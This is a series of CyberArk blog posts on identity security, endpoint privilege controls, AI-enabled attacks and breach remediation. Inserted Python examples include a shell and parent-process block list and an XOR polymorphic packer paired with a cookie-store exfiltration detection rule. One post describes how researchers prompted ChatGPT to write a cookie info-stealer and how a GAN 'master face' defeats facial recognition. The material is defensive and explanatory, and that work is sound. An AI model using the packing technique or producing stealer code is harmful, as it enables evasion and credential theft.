The prolonged period of low-capital costs and widely available funding may be over, yet digital adoption persists as business leaders seek to unlock efficiencies and innovation everywhere. This is driving exponential but often unsecure identity growth in the enterprise and putting existing levels of cyber debt at risk of compounding as investment in digital and cloud initiatives continues to outpace cybersecurity spend. It’s on cybersecurity professionals – who must do more, faster, with less than ever – to keep this organizational cyber debt under control while defending a rapidly expanding and unsecured identity-centric attack surface.

Released today, the CyberArk 2023 Identity Security Threat Landscape Report offers a glimpse into cybersecurity professionals’ world. It’s a massive realm of complex, interconnected environments under constant attack from shapeshifting threats – shadowed by global upheaval, economic uncertainty and rapid technological change, including the evolution of artificial intelligence (AI). Here, boundaries offer scarce protection. Instead, identities – human (employees, third-party users, customers) and machine (applications, infrastructure, bots and workloads) – are the first and last line of defense.

The total number of identities in a typical enterprise is expected to grow by 2.4x in 2023 alone. It’s a demanding job to manage them all while making sure users can securely access resources at the right time, from anywhere, on any device. Out of 2,300 global security decision-makers surveyed, virtually all (99%) say they’ll face an identity-related compromise in the year ahead, stemming from economic-driven cutbacks, geopolitical factors, cloud adoption and hybrid working. Meanwhile, 63% say the highest-sensitivity access for employees, such as IT admins, is not adequately secured today.

Many of these security teams are already understaffed and under-resourced, and nearly one-third of respondents say cybersecurity skills gaps hinder security efforts. As corporate belt-tightening continues, respondents cite growing challenges across six distinct areas of identity security risk:

1. People. Humans are always a security wildcard, and many incidents stem back to user error or intentional misuse. Seventy-four percent of respondents are concerned about confidential information loss stemming from employees, ex-employees and third-party vendors. They point to third parties (partners, consultants and service providers) as the riskiest human identities.

2. Workforce upheaval. Sixty-eight percent of respondents say layoffs and higher levels of employee churn will create new security issues. For example, 58% report instances of exiting users saving sensitive or confidential work documents outside of policy. Every time an employee leaves, the IT team must remove access permissions from the various applications they used. Malicious actors (sometimes former disgruntled employees) count on things slipping through the cracks during manual offboarding processes. One wrongly provisioned, overprivileged or orphaned account is all they need.

3. Machine identities. Due to increasing IT complexity, 62% of security teams operate with limited visibility across their environment. This makes it difficult to understand not only who is accessing sensitive data and assets but also what they are accessing. Last year, we learned machine identities outnumber human ones 45:1. There’s a pressing need to secure them all and secure them fast, yet doing so without impacting users is a tricky balancing act. Forty-two percent of respondents agree that managing and securing both human and machine identity types is equally difficult. This may be why 65% either took steps to protect machine identities last year or plan to do so in the next 12 months.

4. Business systems. When considering which exposed assets could cause the most damage and where they “live,” 42% of respondents say business-critical applications top their list of at-risk systems. Yet more than half of all respondents admit that identities are unmanaged and unprotected in revenue-generating customer-facing applications, enterprise resource planning (ERP), customer relationship management (CRM) and financial management software. This isn’t even the worst-protected environment: only 25% of respondents say sensitive access to bots and robotic process automation (RPA) is secured. Since nearly half of all identities have sensitive access to high-value data or services, often through SaaS applications and automated processes, these findings are particularly concerning.

5. Software development. With a need for speed and flexibility, software developers are often given more access than required – especially in lean times when rapid innovation is key to survival. Perhaps security teams don’t have the bandwidth to handle continuous access requests or developers are applying extra pressure. Regardless, 77% of respondents say developers have too many privileges – making these human identities highly attractive targets. Thirty-eight percent say development is the area where unknown, unmanaged identities create the most risk. Further, 69% say robotic process automation (RPA) and bot deployments are being slowed due to security concerns.

6. Identity security toolsets. Security professionals’ jobs are further complicated by a patchwork of heterogeneous tools from various vendors, creating identity security gaps in some areas and inefficient overlaps in others. Sixty-seven percent of respondents say they currently use tools from up to 40 different identity security vendors. Given the nature of cybersecurity, more enterprises are consolidating their partnerships, and their trust, to a smaller number of long-term vendor partners that can deliver more comprehensive, interoperable solutions that address more of their challenges.

Download The CyberArk 2023 Identity Security Threat Landscape Report

Our latest research also explores the 2023 attack landscape, including industry-specific trends and growing AI angst, and demonstrates the longtail effect of today’s cybersecurity decisions on future success. It shows how forward-looking organizations are prioritizing and tackling key areas of identity risk to amplify security impact.

Download the full report to learn how placing identity at the heart of a Zero Trust cybersecurity approach can help your organization weather the current storm, avoid compounding levels of cyber debt and face the future with confidence.

Clarence Hinton is chief strategy officer, head of corporate development at CyberArk. 

]]>
How Endpoint Privilege Security Helps Organizations Protect Against Threats https://www.cyberark.com/blog/how-endpoint-privilege-security-helps-organizations-protect-against-threats/ Fri, 09 Jun 2023 19:30:33 +0000 https://www.cyberark.com/?p=145347 Layered image loosely representing multilayered endpoint privilege security controls.

Protecting endpoints is more important than ever, as existing threats like ransomware continue to damage organizations and emerging threats like AI-driven attacks add to the problem.

As attackers find new ways to exploit an organization’s vulnerabilities, IT security teams find themselves under pressure to act quickly, often searching for new tools. However, when security solutions are bolted together hastily, problems arise, such as:

  • The solutions are siloed and cannot share data on potential threats and turn insights into action.
  • They also cannot apply an effective control for securing one type of identity (privileged user) to another type of identity (standard user).

This is why we advocate for identity security, both as a strategic approach and as a platform, to address gaps that often appear between patchy security technologies. Identity security provides a solid foundation and fuses the once-siloed security components into an integrated platform that’s designed to be impenetrable, multi-layered and identity-first.

For this to be truly successful, it’s important to take a unified approach. You must break down those silos by contextually authenticating all identities and then dynamically authorizing the least amount of privilege required for any change or action in the environment.

In other words, identity security controls are dynamic and adaptive in nature, so they can ensure the right level of access is granted based on risk. Looking at the following graphic, you’ll notice an integrated identity security approach spans six domains: workforce and customer access, endpoint privilege security, privileged access management, secrets management, cloud security and identity management.

In this blog post, I want to zoom in on one of those domains: endpoint privilege security. Let’s explore the role endpoint privilege security plays in an identity security platform, how it differs from endpoint privilege management and what capabilities and controls you should look for in a solution.

Graphical depiction of CyberArk's identity security platform

What Is Endpoint Privilege Security?

Endpoint privilege security ensures that organizations take control of unmanaged privilege on endpoints, significantly reducing the attack surface and defending against threats such as ransomware.

It builds upon the existing access control components found in operating systems — accounts, account groups, file and folder permissions and access control lists. Granted, these controls are powerful because they are built into operating systems’ kernels. But they can be hard to manage in complex environments and at scale. (Worth noting, they also come very cheap computationally as they don’t require components such as complex heuristics, pattern extraction and matching algorithms, emulators, behavioral analyzers and such.) By introducing an efficient management layer on top of these mechanisms, endpoint privilege security can deliver foundational, granular and efficient security for any endpoint, a high level of visibility and control and role-specific least privilege.

Look Beyond Labels

Before we dive into the functional breakdown of endpoint privilege security, let’s briefly talk about naming. Within the IT security community – leaders, practitioners, analysts and more – there’s some complexity and confusion around how we name, define and refer to the act of securing endpoints. To be clear, I’m not pointing any fingers! However, it’s important to get the naming right when you’re determining the strategic approaches, controls and solutions needed to defend against threats.

A traditional way of looking at privilege management on the endpoint is to consider it a part of privileged access management (PAM) that is “landed” onto an organization’s endpoints. Through this perspective, many consider managing access to applications – the ability to run them – to be the main functionality. Therefore, this category is traditionally called “privilege elevation and delegation management” (PEDM). But there’s a problem: the word “endpoint” is notably missing from the name. Perhaps this is why our industry more often calls these tools “endpoint privilege management” solutions.

I, however, argue that another, even more important word is missing from the fold, and that’s “security.” If you ask me, there’s a big difference between endpoint privilege management and endpoint privilege security.

  • Endpoint privilege management helps organizations align to a key security concept – say it with me: “Nobody should work under an administrator account!” – and not lose too much in the process. Here, organizations have taken an important step in reducing risk, but by following up with “management,” the focus shifts to standard users and merely helps automate some IT helpdesk tasks as support tickets begin to flow in from users who’ve lost admin rights. You’ve checked one box on the security checklist but not much more – all while creating additional operational friction and load.
  • Endpoint privilege security, on the other hand, requires implementing least privilege to the extreme, while also removing operational friction as much as possible. Least privilege is enforced across the board for standard users, advanced users and administrators alike. And it is role-specific, which means instead of only having minimum restrictions that can allow just about anything to fly under the radar, we can now really push this concept and implement security tailored for each role in a company – and they will love it! Least privilege is absolutely essential to endpoint (and not only endpoint) security because it limits the attacker’s ability to reach endpoints, gain persistence, collect and exfiltrate data, rely on existing tools, tamper with other programs and operating systems, conceal their presence and wipe evidence, tamper with security and deliver impact. This is, of course, a short version – but you can read more in this blog post.

Endpoint privilege security controls not only users’ permissions but those of applications as well, including the execution chain, access to specific resources, the ability to read files and so on. It also ensures that the most critical data can be protected from any and every application, securing credentials, hashes, security tokens, passwords and cookies across operating system credential stores, third-party applications and browsers.

As noted, a litmus test to help tell endpoint privilege management apart from endpoint privilege security centers on a simple question: who is the end user you’re focusing on? If it’s standard (regular) users only, you are looking at endpoint privilege management. But if you’re focusing on every user – standard users and admins alike – that’s endpoint privilege security.

File this under “Why should our industry ever make things easy?” Many solutions in the market, each with their own different functionality sets and maturity levels, have some variation of “endpoint,” “privilege” and “manager” in the name.

But since we could argue that some endpoint providers belong in the “management” category while others belong in “security,” we’ll have to look beyond names. “Security” is different from any other word, as it is not a declaration or simple matter of branding – it’s a commitment. As such, security must traverse every aspect of a solution’s design, implementation, functioning and audit capabilities.

Here are some pointers you might find useful for evaluating endpoint privilege management/security controls and capabilities, keeping in mind how certain design decisions might affect users’ experience and, maybe more importantly, your organization’s security and compliance.

Endpoint Privilege Security – Controls and Functionalities to Look For

In an integrated identity security approach, every domain – from endpoint to cloud – is strengthened by forging bonds with each other’s functionalities and controls. This sounds like a cliché, but synergies do truly emerge thanks to tight integrations between identity security components. One example is the tightening of elevation policies when a user’s actions, environment or location push adaptive, continuous authentication past its risk threshold: the user is asked to re-authenticate before performing a high-risk action that would not normally trigger that challenge.

This tight integration really reduces operational friction while helping secure users’ environments and locations. Here are four areas of functionality to consider when vetting endpoint privilege security providers, keeping those silo-breaking bonds in mind.

  • Functionality traditionally attributed to PAM -> PEDM:
    • Zero Standing Privileges – all elevations happen just in time, according to policy
    • Comprehensive privilege control of child processes
    • Timed administrative sessions (just-in-time)
    • Application and processes discovery and control
    • Conditional elevation, driven by policy and context (user, application, device state, risk)
    • Privileged account discovery and removal/demotion
    • Support for break-glass scenarios (offline devices, rollback of system configurations, etc.)
    • Policy and event audit for application events and privileged actions
  • Functionality from endpoint protection platforms (EPP):
    • Application execution control (can it launch?)
    • Application access control (what can it interact with — access to resources, such as intranet, internet, memory?)
    • Application privilege control (can it elevate?)
    • Prevention of exploits that abuse the execution chain
    • File threat analysis, leveraging cloud-based reputation services
    • Ransomware protection
    • Ability to automate detection and response actions based on threat level and auto-execution of threat response playbooks
  • Functionality from cloud workload protection (CWP):
    • That of EPP (outlined above)
    • API-based control (API-first implementation) for extensive automation
    • Cloud workload hardening
    • Ability to protect virtual machines, particularly persistent and non-persistent virtual desktops
    • Ability to protect Desktop as a Service (DaaS) instances
    • Ability to protect instances in public cloud infrastructures
    • Ability to integrate with the cloud fabric to enable automated procurement, scaling and interoperation with cloud-native services
  • Functionality from identity threat detection and response (ITDR):
    • Active defense of user credentials (passwords, password hashes, login-key pairs, sign-in certificates)
    • Active defense of session tokens (browser cookies)
    • Active defense of security and authentication tokens
    • Privilege deception
    • Identity-specific, context-rich event recording
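As an added example, and not CyberArk’s code, the following hypothetical Python policy evaluator shows how several of the PEDM-side controls above fit together on one launch request: execution-chain control (a document reader spawning a shell is refused before any privilege rule is consulted), hash-pinned application rules, Zero Standing Privileges (no matching rule means the application still runs, but unprivileged, rather than being blocked), a timed just-in-time admin session, and the risk-threshold step-up challenge described earlier. Rule names, application hashes, process names, risk scores and the re-auth window are all constructed for the example.

```python
import hashlib
import time
from dataclasses import dataclass
from typing import FrozenSet, Iterable, Optional, Tuple

# Added example, not CyberArk code. Outcomes an endpoint agent would act on; there is
# deliberately no "standing admin": an app is elevated for this launch or runs unprivileged.
DENY = "deny"
RUN_STANDARD = "run_standard"
ELEVATE = "elevate"
STEP_UP = "step_up_required"

# Execution-chain control: a document reader or mail client spawning a shell is a
# classic exploit chain and is blocked before any privilege rule is consulted.
SUSPICIOUS_PARENTS = frozenset({"winword.exe", "excel.exe", "outlook.exe", "acrord32.exe"})
SHELLS = frozenset({"powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe"})


@dataclass(frozen=True)
class Context:
    user: str
    role: str                      # "standard", "developer" or "admin"
    app_name: str
    app_sha256: str
    parent_chain: Tuple[str, ...]  # nearest parent first
    risk_score: int                # 0..100, supplied by adaptive authentication
    reauth_age_s: Optional[float]  # seconds since last strong re-auth, None if never
    wants_elevation: bool


@dataclass(frozen=True)
class Rule:
    name: str
    roles: FrozenSet[str]
    app_names: FrozenSet[str]
    app_hashes: FrozenSet[str]     # empty means any build of the named app
    elevate: bool
    max_risk: int = 100            # above this, elevation needs a fresh re-auth
    reauth_window_s: float = 300.0


@dataclass(frozen=True)
class JitSession:                  # timed admin session, granted just in time
    user: str
    granted_at: float
    ttl_s: float

    def active(self, now: float) -> bool:
        return self.granted_at <= now < self.granted_at + self.ttl_s


def find_rule(rules: Iterable[Rule], ctx: Context) -> Optional[Rule]:
    """First rule whose role and application name match (rules are ordered)."""
    for rule in rules:
        if ctx.role in rule.roles and ctx.app_name in rule.app_names:
            return rule
    return None


def evaluate(rules: Iterable[Rule], ctx: Context,
             jit: Optional[JitSession] = None, now: Optional[float] = None) -> str:
    now = time.time() if now is None else now
    # 1. Execution-chain control applies to every user, admins included.
    if ctx.app_name in SHELLS and any(p in SUSPICIOUS_PARENTS for p in ctx.parent_chain):
        return DENY
    rule = find_rule(rules, ctx)
    # 2. An elevation-approved app whose hash no longer matches is treated as tampered.
    if rule is not None and rule.app_hashes and ctx.app_sha256 not in rule.app_hashes:
        return DENY
    if not ctx.wants_elevation:
        return RUN_STANDARD
    # 3. An active JIT admin session elevates without a per-app rule, until it expires.
    if jit is not None and jit.user == ctx.user and jit.active(now):
        return ELEVATE
    # 4. Zero Standing Privileges: no matching elevation rule means the app still
    #    launches, but as the standard user.
    if rule is None or not rule.elevate:
        return RUN_STANDARD
    # 5. Conditional elevation: above the rule's risk threshold, demand a fresh
    #    re-authentication first (the step-up challenge described above).
    if ctx.risk_score > rule.max_risk:
        fresh = ctx.reauth_age_s is not None and ctx.reauth_age_s <= rule.reauth_window_s
        return ELEVATE if fresh else STEP_UP
    return ELEVATE


# Constructed sample policy; the hash stands in for the one approved docker.exe build.
DOCKER_OK = hashlib.sha256(b"docker.exe approved build").hexdigest()
RULES = (
    Rule("dev-tools", frozenset({"developer"}), frozenset({"docker.exe"}),
         frozenset({DOCKER_OK}), elevate=True, max_risk=50),
    Rule("printer-setup", frozenset({"standard", "developer"}), frozenset({"printui.exe"}),
         frozenset(), elevate=True, max_risk=80),
)


def launch(user: str, role: str, app: str, sha256: str, parents=("explorer.exe",),
           risk: int = 10, reauth_age: Optional[float] = None, elevate: bool = True) -> Context:
    return Context(user, role, app, sha256, tuple(parents), risk, reauth_age, elevate)
```

Two design points are worth noticing. A request that matches no rule returns run_standard, not deny: the point of Zero Standing Privileges is that the user keeps working, just without admin rights, so the helpdesk ticket flow the post warns about never starts. And the hash check runs even when no elevation was requested, because a modified copy of an elevation-approved binary is the thing an attacker would most like to launch under a standard account first.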

Bringing It All Together: Endpoint Privilege Security

To recap, in today’s threat landscape, it’s essential to do more than manage program elevation on endpoints. Organizations must enforce role-specific least privilege and protect machines with multilayered endpoint privilege security controls centered around identity. In this post, we explored the fundamentals of this critical, but often missing, area and the integral role it plays in a modern cybersecurity program.

Learn more about how CyberArk’s endpoint privilege security solution and its role in an integrated identity security platform help organizations enforce least privilege and protect against threats such as ransomware.

Andrey Pozhogin is a senior product marketing manager at CyberArk. 

Analyzing 3 Offensive AI Attack Scenarios https://www.cyberark.com/blog/analyzing-3-offensive-ai-attack-scenarios/ Thu, 08 Jun 2023 07:10:02 +0000 https://www.cyberark.com/?p=145318

Artificial intelligence (AI) is transforming modern society at unprecedented speed. It can do your homework, help you make better investment decisions, turn your selfie into a Renaissance painting or write code on your behalf. While ChatGPT and other generative AI tools can be powerful forces for good, they’ve also unleashed a tsunami of attacker innovation and concerns are mounting quickly. In the last week alone, several government officials and AI leaders have issued warnings about the growing AI threat:

  • The Center for AI Safety released this one-sentence statement signed by more than 350 prominent AI figures: “Mitigating the risk of extinction from AI should be a global priority alongside other societal-scale risks such as pandemics and nuclear war.”
  • The head of the U.S. Federal Trade Commission emphasized the need for vigilance, noting that the FTC is already seeing AI used to “turbocharge” fraud and scams.
  • A panel of United Nations experts called for “greater transparency, oversight and regulation to address the negative impacts of new and emerging digital tools and online spaces on human rights.”
  • The EU urged tech firms to “clearly label” any services with a potential to disseminate AI-generated disinformation.

As part of the broader cybersecurity research community, CyberArk Labs is focused on this evolving threat landscape to better understand what emerging AI attack vectors mean for identity security programs and help shape new defensive innovations.

I presented highlights from our latest threat research at CyberArk IMPACT23 in Boston, including the three attack scenarios highlighted below. As you’ll see, AI is changing the offensive game in several ways, but not all of them. Nearly every attack continues to follow a familiar progression, as outlined in the MITRE ATT&CK Matrix for Enterprise illustrated here, leaning heavily on identity compromise and high-sensitivity access:

A common attack chain following 14 tactics defined by the MITRE ATT&CK Matrix for Enterprise

Offensive AI Scenario 1: Vishing

As a conscientious employee, you’ve become very skeptical of phishing emails and know what to look out for. But imagine you’re sitting at your desk and receive a WhatsApp message from the CEO of your company asking you to transfer money right away. You see his avatar and hear his distinct voice on the message. It’s a little strange since you’ve never communicated with him this way, but you ask him where you should send the funds and he responds immediately with all the necessary details. It must be him, right?

Not so fast. AI text-to-speech models make it easy for attackers to mine publicly available information, such as CEO media interviews, and use it to impersonate company executives, celebrities and even U.S. presidents. By building trust with their target, attackers can obtain access to credentials and other sensitive information. Now imagine how such a vishing campaign could be done at scale using automated, real-time generation of text and text-to-voice models.

Such AI-based deep fakes are already commonplace and can be very difficult to spot. AI experts predict that AI-generated content will eventually be indistinguishable from human-created content – which is troubling for cybersecurity professionals and everyone else.

Offensive AI Scenario 2: Biometric Authentication

Now let’s switch gears from attacks on the ears to attacks on the eyes. Facial recognition is a popular biometric authentication option for accessing devices and infrastructure. It can also be duped by threat actors using generative AI to compromise identities and gain an initial foothold in an environment.

In one remarkable study, threat researchers at Tel Aviv University created a “master face” (or “master key”) that could be used to bypass most facial recognition systems. They used a generative adversarial network (GAN) as the face generator and iteratively optimized its input latent vector, scoring each candidate face against the facial images housed in a large, open face dataset. Their research produced a set of nine images that matched more than 60% of the faces in that dataset against the recognition model tested, meaning an attacker presenting those images would have roughly a 60% chance of passing facial recognition authentication for a randomly chosen enrolled user on a comparable system.

Our CyberArk Labs team built on this theoretical research to demonstrate how attackers could actually bypass facial recognition authentication. Check it out:

CyberArk Labs demonstrates an attack using generative AI to bypass facial recognition authentication

Generative AI models have been around for years – so why so much buzz right now? In a word, scale. Today’s models can learn at incredible scale. Consider that GPT-2 had 1.5 billion parameters (variables in an AI system whose values are adjusted during training to establish how input data gets transformed into the desired output). Its successor, GPT-3, has 175 billion – more than 100x that. This growth in parameters was made possible by advances in cloud computing and the volume of data generated in the perimeter-less environments that define our digital era. As AI models continue to learn, they’ll continue to get better at creating realistic deep fakes, malware and other threats that will change the landscape.

Offensive AI Scenario 3: Polymorphic Malware

Many researchers and developers are experimenting with generative AI to write all kinds of code – including malware. For offensive campaigns, AI can be incredibly effective during the earliest stages of the attack chain, such as reconnaissance, malware development and initial access. However, it is not yet clear that AI TTPs (tactics, techniques and procedures) are useful after an attacker is inside and working to escalate privileges, access credentials and move laterally. These three stages all hinge on identity compromise, underscoring the importance of robust intelligent identity security controls in protecting critical systems and data.

Based on our research, CyberArk Labs sees a new AI-fueled technique that falls under MITRE’s defense evasion tactic – polymorphic malware – and continues to analyze this area closely.

Offensive AI techniques mapped to the MITRE ATT&CK Matrix for Enterprise

Polymorphic malware mutates its implementation while keeping its original functionality intact. Until recently, malware was called “polymorphic” if it changed the encryption of its modules (and the small decryptor stub that unpacks them) from one copy to the next, so that no two samples shared a static signature – which is what makes it especially difficult for defenders to identify. After generative AI introduced the possibility of mutating or generating code modules with different implementations, our team quickly began experimenting with ChatGPT to create polymorphic malware. Not because it’s a great way to create code (it’s not), but because it’s so accessible and fun …

We asked ChatGPT to generate an info-stealer – a type of malware that fetches session cookies once it’s executed on disk. You can check out all the code and technical details in our Threat Research blog post, “Chatting Our Way Into Creating a Polymorphic Malware,” but here are our high-level takeaways: ChatGPT is an enthusiastic, yet naïve, developer. It writes code quickly but misses critical details and context. During our experiment, the chatbot created a hard-coded password and tried to use it to decrypt session cookies – a huge security red flag that made us wonder where it learned this risky (and unfortunately, very common) practice.

Ultimately, we found that defense evasion using AI-generated polymorphic malware is viable. For example, an attacker could use ChatGPT to generate (and continuously mutate) information-stealing code for injection. By infecting an endpoint device and targeting identities – locally stored session cookies, in our research – they could impersonate the device user, bypass security defenses and access target systems while staying under the radar. As AI models improve and attackers continue to innovate, automated identity-based attacks like these will become part of malware operations.

Countering Attack Innovation with AI-Powered Defense

We can take away three things from these attack scenarios:

  1. AI already has and will continue to impact the threat landscape in many ways – from how security weaknesses are found to how malicious code is developed. It presents threat actors with new opportunities to target identities and even bypass authentication mechanisms. And it won’t take long for AI to hone its skills.
  2. Identities remain prime attack targets. Identity compromise continues to be the most effective and efficient way for attackers to move through environments and reach sensitive systems and data.
  3. Malware-agnostic defenses are even more critical. Security layers must evolve to not only quarantine malicious activity, but also enforce preventive practices, such as least privilege access or conditional access to local resources (like cookie stores) and network resources (like web applications).
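The polymorphism described under Scenario 3 and the third takeaway above (malware-agnostic defenses such as conditional access to the cookie store) are easiest to see side by side. The following Python example is added here and is not CyberArk Labs’ code, nor any real stealer: it uses an inert, constructed byte string as the “body”, re-encrypts it under a fresh key behind random junk on every build (the classic polymorphic trick, so every build has a new hash and a hash signature for yesterday’s build misses today’s), and then runs a simple behaviour rule over a constructed event stream to show that the behaviour – a non-browser process opening a browser cookie store and then connecting out – is identical across builds and is caught regardless. Paths, process names and the collector host are assumptions.

```python
import hashlib
import random
from typing import Dict, List, Set, Tuple

# Added example, not CyberArk Labs code. Constructed, inert stand-in for a stealer body.
# Only its bytes matter here: each "build" ships different bytes with identical behaviour.
BODY = b"stand-in payload: read browser cookie store, post it to collector"


def _xor(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def polymorph(body: bytes, rng: random.Random) -> bytes:
    """One mutated build: fresh key, fresh junk prefix, body re-encrypted under the key."""
    key = bytes(rng.getrandbits(8) for _ in range(16))
    junk_len = rng.randint(1, 64)
    junk = bytes(rng.getrandbits(8) for _ in range(junk_len))
    # layout: 1 byte junk length | junk | 16-byte key | encrypted body
    return bytes([junk_len]) + junk + key + _xor(body, key)


def unpack(variant: bytes) -> bytes:
    """What a build's own stub does at run time: skip the junk, recover the body."""
    junk_len = variant[0]
    key = variant[1 + junk_len:1 + junk_len + 16]
    return _xor(variant[1 + junk_len + 16:], key)


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def hash_signature_hit(known: Set[str], variant: bytes) -> bool:
    """Static, hash-based detection: only ever matches a build seen before."""
    return sha256(variant) in known


# Behaviour side. Every build, once unpacked, does the same thing, modelled here as the
# event stream an endpoint sensor would see. Paths, process and host names are constructed.
COOKIE_STORE_MARKERS = ("\\User Data\\Default\\Network\\Cookies", "cookies.sqlite")
BROWSERS = frozenset({"chrome.exe", "msedge.exe", "firefox.exe"})
Event = Tuple[str, str, str]  # (kind, process, target)


def events_for(process: str) -> List[Event]:
    return [
        ("open_file", process,
         "C:\\Users\\dana\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies"),
        ("net_connect", process, "collector.example:443"),
    ]


def cookie_store_alerts(events: List[Event]) -> List[str]:
    """Conditional access to the cookie store: only a browser may open it, and a
    non-browser that reads it and then talks out is flagged twice."""
    alerts: List[str] = []
    read_store = False
    for kind, process, target in events:
        if kind == "open_file" and any(m in target for m in COOKIE_STORE_MARKERS):
            if process.lower() not in BROWSERS:
                alerts.append(f"{process} opened cookie store {target}")
                read_store = True
        elif kind == "net_connect" and read_store:
            alerts.append(f"{process} connected to {target} after reading the cookie store")
    return alerts


def demo(seed: int = 7) -> Dict[str, bool]:
    rng = random.Random(seed)
    v1, v2 = polymorph(BODY, rng), polymorph(BODY, rng)
    known = {sha256(v1)}  # the signature written for yesterday's build
    return {
        "same_behaviour": unpack(v1) == BODY and unpack(v2) == BODY,
        "distinct_hashes": sha256(v1) != sha256(v2),
        "signature_catches_new_build": hash_signature_hit(known, v2),
        "behaviour_catches_any_build": len(cookie_store_alerts(events_for("updater.exe"))) == 2,
        "browser_stays_quiet": cookie_store_alerts(events_for("chrome.exe")) == [],
    }
```

Calling demo() returns the five findings as booleans: both builds unpack to the same body, their hashes differ, the hash signature misses the second build, and the behaviour rule fires on it anyway while staying silent for the real browser. Swapping a GAN or an LLM for the XOR packer changes nothing on the behaviour side, which is why the takeaway above favours controls that never need to know what the binary looks like.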

As our AI-focused threat research continues, it’s important to remember that AI is also an incredibly powerful tool for cyber defenders. It will be key to countering change in the threat landscape, improving agility and helping organizations stay one step ahead of attackers. It also represents a promising new chapter where cybersecurity deployments are simpler, highly automated and more impactful. By harnessing AI to optimize security boundaries where they’re needed most – around human and non-human identities – organizations can effectively mitigate threats today and in the future.

Editor’s note: To learn more about the ever-expanding attack surface, attacker techniques and trends in identity-based cyberattacks, join CyberArk on the Impact World Tour in a city near you.

Lavi Lazarovitz is vice president of cyber research at CyberArk Labs.

Cyber Breach Remediation’s 5-Step Cycle https://www.cyberark.com/blog/cyber-breach-remediations-5-step-cycle/ Thu, 01 Jun 2023 06:38:13 +0000 https://www.cyberark.com/?p=145193

Organizations tend to fall into two categories: those that have been breached and those that don’t yet realize they’ve been breached.

If you belong to the first group, believe it or not, you’re in luck. Once the breach has been acknowledged, your organization is closer to fixing the problem and overcoming the damage. You can use your existing tools and onboard new ones like session isolation, multi-factor authentication (MFA) and least privilege on endpoints to start the remediation process as soon as possible.

If you fall into the second group, you’re either not aware of a breach or you might know you don’t have the proper controls in place to mitigate one. For these organizations, it’s time to build an extended identity security program from the foundation of protecting the most privileged accounts and users. Advanced privileged access management (PAM) solutions can significantly reduce the risk of human error when accessing privileged accounts and sensitive environments or data. These tools can help remediate and prevent breaches caused by compromised credentials.

Organizations are increasingly realizing that no one is immune to security breaches. In a recent CyberArk survey, 92% of global organizations indicated identity security is critical for a robust Zero Trust implementation. But how should these organizations tackle the challenge of staying ahead of attackers while always assuming breach and adopting a Zero Trust mindset? Enter breach remediation – a cyclical, never-ending process that, when done properly, helps organizations improve after every incident and can significantly reduce damages and subsequent risks to their environments.

Breach Remediation in Five Steps

There are five steps in the breach remediation cycle:

Step 1: Identify Vulnerabilities

Once your security team discovers a breach, it’s time to jump into action. The team must first determine the status of the attack and its origin. It also needs to identify the vulnerability the intruder used to gain access and track their actions. Popular attack patterns change from time to time, but most frequently, threat actors sink their hooks into someone on the inside who is unaware that their actions (or inactions) have allowed access to systems and data.

Common examples of these actions include internal employees not using multi-factor authentication (MFA) or endpoint controls, running untrusted applications and sharing credentials.

Step 2: Investigate the Breach in Its Entirety

While it’s critical first to identify the point of attack, you must then dig deeper to better understand the complete picture. This is where an internal incident response team or external advisory should come in. The team reviews the forensic findings and data to track the breach path. Incident responders seek information about compromised controls or identities and exploited vulnerabilities.

Piece together as many details as you can early on with the remediation team to help inform your remediation strategy. Correlating data from systems, accounts and users will allow you to understand the attack and how it affects your organization.

Ask focused questions: What data was exposed? Is the attack still happening?

Step 3: Take Action to Repair the Situation

Once you’ve gathered your facts, you need to decide what action to take immediately. This step is the most challenging part of the breach remediation process, and the correct choice will vary depending on the situation. Just as breaches differ, so do remediation actions.

For example, you may decide to disclose the incident publicly or take down the compromised service – or both. Whatever you decide to do, you must consider any impact the actions will have on your customers and internal users. And you also need to be mindful of the financial consequences of your post-breach actions and how they may affect the extent of the damage to your organization and its reputation.

“During remediation, being informed, having the right tools and understanding how to implement controls is critical, but as importantly, you should always consider the part played by the people in the situation.”—CyberArk Senior Security Consultant Aaron Fletcher

Step 4: Collaborate With a Remediation Team

Now that you’ve decided on a path forward, it’s crucial to collaborate with subject matter experts like a remediation team. They can assist in regaining control of your environment and evaluating the hygiene of your existing identity security tools and policies – and, if needed, onboarding new ones that suit your organization’s needs. Working with an experienced remediation team can help you contain a breach, identify any gaps that attackers may exploit and implement tools like MFA or session isolation. With support from a remediation team, you can eventually eradicate the breach and enforce new, stricter access policies within your environment.

After containment and eradication, the third benefit of collaborating with a remediation team is recovery. The team can help ensure that the new tools and policies work as planned.

Then, once the risk is contained, it’s time to look back at everything – from understanding what happened that allowed the breach to occur to what your organization could have done better in responding to it. You can better prepare for future incidents when you and your team acknowledge and understand any mistakes and necessary improvements to your response.

Step 5: Prepare for the Next Security Event

Preparing and responding to security threats and breaches is cyclical. You prepare and defend, tackle the incident, learn from it – and then prepare again. And preparation is always the first and the last stage of the cycle. With each new cycle, you learn and work to improve your security posture. After an incident, teams should return to the drawing board to further develop their identity security strategy and PAM program.

And don’t forget your employees. A full post-breach recovery requires considerable effort from your internal teams, and you must set them up to succeed. While onboarding new services is an important first step, coaching and educating your employees is crucial for being perpetually prepared for cyber threats.

Golden Rules for Successful Breach Remediation

Cybersecurity often feels like a numbers game, where professionals focus most on preventing and stopping attacks. But defenses can always be breached – and in today’s threat landscape, that probability is increasing.

When considering your own comprehensive, ongoing breach remediation plan, keep these essentials top of mind:

  • Understand the sensitivity of what you’re trying to protect and the privileged access provided to those protected resources. Always be mindful of human involvement in any change in process or implementation of identity security controls, policies or strategies.
  • Train and educate your end users. Invest in informing internal teams of upcoming changes and start preparing them as early as possible. You should enable your employees with the right tools and assistance to learn how to protect themselves and your organization while working in secure environments and accessing organizational assets.
  • Implement the right identity security tools. Among others, PAM, MFA and endpoint controls at the right time can help increase security significantly and reduce the risk of an attack.

With a solid breach remediation strategy, your organization will be more likely to respond quickly to a breach, limit the damage and rapidly regain control.

Lilach Faerman Koren is a product marketing manager at CyberArk.

Battling the Three Forces of Identity Security at IMPACT23 https://www.cyberark.com/blog/battling-the-three-forces-of-identity-security-at-impact23/ Thu, 25 May 2023 13:17:44 +0000 https://www.cyberark.com/?p=145075

Identity security: it’s a battle being waged on three fronts – and a rallying point for global cybersecurity professionals attending CyberArk IMPACT23, the identity security event of the year, held this week in Boston.

